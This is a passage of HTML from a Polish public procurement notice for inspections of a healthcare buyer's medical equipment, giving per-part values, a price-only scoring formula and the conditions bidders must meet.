(NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 - Defibrylator HeartStart XL oraz Defibrylator HeartStart MRx;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12760,0 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5 – Defibrylator AED PLUS oraz Defibrylator M-SERIES;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3600,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6 – Aparat do znieczulenia AESPIRE VIEW;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8700,00 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 7 – Kardiomonitor VISTA 120;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1750,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 8 – Aparaty do EKG ELI 230, ELI 250, ELI 350, ELI 250C oraz Cykloergometr CORIVAL;<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6820,00 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 9 – Generator do cięć i koagulacji tkanek GEN11.<br/>Przedmiotem zamówienia jest usługa polegająca na wykonaniu przeglądów aparatury medycznej będącej własnością lub<br/>użytkowanej przez Zamawiającego.<br/>2. Krótki opis przedmiotu zamówienia: przedmiotem zamówienia jest wykonanie przeglądów aparatury medycznej,<br/>określonej w załączniku nr 2 do SWZ (formularz asortymentowo-cenowy), których zakres określa załącznik nr 4 do SWZ<br/>(projekt umowy).<br/>3. Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 części zamówienia </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50400000-9 - Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu (w danej<br/>części zamówienia).<br/>2. W celu dokonania wyboru najkorzystniejszej oferty w niniejszym postępowaniu Zamawiający będzie kierował się jednym kryterium<br/>– kryterium ceny.<br/>3. Punktacja przyznawana ofertom w kryterium cena i łączna punktacja będą liczone z dokładnością do dwóch miejsc po przecinku,<br/>zgodnie z zasadami arytmetyki (zaokrąglania).<br/>4. Szczegółowe zasady przyznawania punktów:<br/>1) ocenie podlega cena brutto oferty podana w formularzu ofertowym, z uwzględnieniem poprawek omyłek rachunkowych i innych<br/>omyłek mających wpływ na cenę brutto oferty;<br/>2) punktacja w kryterium cena wyliczana będzie według następującego wzoru:<br/>LP = (NC/CBO) * 100, gdzie:<br/>„LP” oznacza liczbę punktów w kryterium cena,<br/>„NC” oznacza najniższą cenę spośród ofert niepodlegających odrzuceniu,<br/>„CBO” oznacza cenę badanej oferty,„100” oznacza wagę kryterium;<br/>5. Za najkorzystniejszą ofertę, odpowiednio dla każdej części zamówienia, uznana zostanie oferta, która uzyska największą liczbę<br/>punktów łącznie (suma punktów odpowiadać będzie punktom uzyskanym w kryterium cena), z uwzględnieniem ust. 1.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale XI SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu: zdolności technicznej<br/>lub zawodowej:<br/>a) w zakresie zadań / części zamówienia nr od 1 do 9: Wykonawca musi dysponować przynajmniej jedną osobą<br/>posiadającą uprawnienia nadane (wystawione) przez producenta lub dystrybutora uprawnionego przez producenta<br/>aparatury medycznej (której dotyczy przegląd(y) w danej części zamówienia), która zostanie skierowana do realizacji<br/>zamówienia (wykonania usługi – przeglądu/ów). Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, żedysponuje lub będzie dysponował przynajmniej jedną osobą posiadającą uprawnienia nadane (wystawione) przez<br/>producenta lub dystrybutora uprawnionego przez producenta aparatury medycznej (której dotyczy przegląd(y) w danej<br/>części zamówienia), która zostanie skierowana do realizacji zamówienia (wykonania usługi – przeglądu/ów);<br/>b) w zakresie zadań / części zamówienia nr od 1 do 9: Wykonawca musi wykazać się, że w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub wykonuje<br/>minimum dwie usługi serwisowe (przeglądy) aparatury medycznej (szczegółowo opisanej w zakresie producenta oraz<br/>modelu aparatury medycznej), dla wskazanego przez Wykonawcę zadania / części zamówienia. Warunek zostanie uznany<br/>za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub wykonuje minimum dwie usługi serwisowe<br/>(przeglądy) aparatury medycznej (szczegółowo opisanej w zakresie producenta oraz modelu aparatury medycznej), dla<br/>wskazanego przez Wykonawcę zadania / części zamówienia. Wykazane usługi muszą dotyczyć takiej samej aparatury, pod<br/>względem producenta i modelu urządzenia, jak aparatura medyczna objęta zakresem usługi w danej części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2) w zakresie zadań / części<br/>zamówienia nr od 1 do 9: wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług (osób, które będą wykonywały przeglądy aparatury medycznej), wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami (wzór wykazu osób<br/>stanowi załącznik nr 6 do SWZ),<br/>3) w zakresie zadań / części zamówienia nr od 1 do 9: wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych<br/>również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, usług potwierdzających spełnienie warunku udziału w postępowaniu – z podaniem przedmiotu<br/>zamówienia szczegółowo opisanego w zakresie producenta oraz modelu aparatury medycznej, dat wykonania i podmiotów<br/>leczniczych na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub<br/>są wykonywane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wystawione w okresie ostatnich<br/>3 miesięcy (wzór wykazu osób stanowi załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami i/lub informacjami potwierdzającymi<br/>przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór<br/>oświadczenia stanowi załącznik nr 5 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą (tj. formularzem ofertowym – zgodnym z wzorem określonym w załączniku nr 1 do SWZ) Wykonawca<br/>zobowiązany jest złożyć:<br/>1) formularz asortymentowo-cenowy, stanowiący załącznik nr 2 do SWZ;<br/>2) oświadczenie, o którym mowa w art. 125 ust. 1 i art. 273 ust. 2 ustawy Pzp, którego wzór stanowi załącznik nr 3 do SWZ;<br/>3) dokument lub dokumenty (w tym pełnomocnictwo lub pełnomocnictwa), z których wynika prawo do podpisania oferty,<br/>oświadczeń i innych dokumentów składanych wraz z ofertą,<br/>o ile nie wynika ono z dokumentów rejestrowych (np.: KRS/CEIDG);<br/>4) (jeśli dotyczy) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie (w przypadku,<br/>gdy ofertę składają Wykonawcy wspólnie ubiegający się<br/>o zamówienie);<br/>5) (jeśli dotyczy) zobowiązanie innego podmiotu lub inny dokument/oświadczenie potwierdzający udostępnienie zasobów<br/>przez inny podmiot na rzecz Wykonawcy<br/>w związku z niniejszym postępowaniem, o ile Wykonawca powołuje się na zasoby innego podmiotu;<br/>6) (jeśli dotyczy) uzasadnienie utajnienia części oferty (formularzy, dokumentów, oświadczeń), przy czym uzasadnienie<br/>będzie w całości jawne – utajniona część oferty powinna znajdować się w osobnym pliku, aby nie było problemu z<br/>jednoznacznym określeniem zakresu utajnionych informacji;<br/>7) (jeśli dotyczy) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy;<br/>8) (jeśli dotyczy) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>przedstawia, wraz z oświadczeniem, o którym mowa w ust. 14 pkt 2, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span 